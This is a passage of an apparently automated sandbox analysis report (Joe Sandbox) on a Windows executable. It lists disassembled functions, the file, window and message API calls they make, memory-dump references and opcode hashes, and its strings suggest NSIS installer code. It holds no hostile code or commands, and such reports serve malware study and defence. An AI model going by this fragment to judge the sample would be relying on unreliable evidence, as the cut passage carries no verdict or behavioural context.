                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                    • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                                                    Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                    • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                                                    Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                                    • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                    • Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE
                                                                                                                                                                                                                                                                                                    Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                    • Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C
                                                                                                                                                                                                                                                                                                    Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                    • Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C
                                                                                                                                                                                                                                                                                                    Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                    • Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09
                                                                                                                                                                                                                                                                                                    Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                    Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028476407.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                                    • Opcode ID: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60dec75628f9769c23c01a777027d1821986551530c1d832e54061f08b3160b2
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                                    Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2028279144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028251321.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028314356.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2028355545.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
